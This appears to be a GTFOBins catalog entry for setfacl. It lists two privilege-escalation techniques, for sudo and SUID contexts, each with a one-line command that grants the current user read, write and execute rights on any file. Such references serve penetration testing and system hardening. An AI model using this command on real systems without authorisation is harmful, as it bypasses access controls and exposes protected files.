Catalog GTFOBins

GTFO · Tool

setfacl

2 techniques LinuxGTFOBins GPL-3.0

privilege-escalation

Privilege Escalation Linux

This can be run with elevated privileges to change ownership and then read, write, or execute a file.

setfacl -m u:$(id -un):rwx /path/to/input-file
Context
sudo
Native
privilege-escalation
MITRE
T1548

privilege-escalation

Privilege Escalation Linux

This can be run with elevated privileges to change ownership and then read, write, or execute a file.

setfacl -m u:$(id -un):rwx /path/to/input-file
Context
suid
Native
privilege-escalation
MITRE
T1548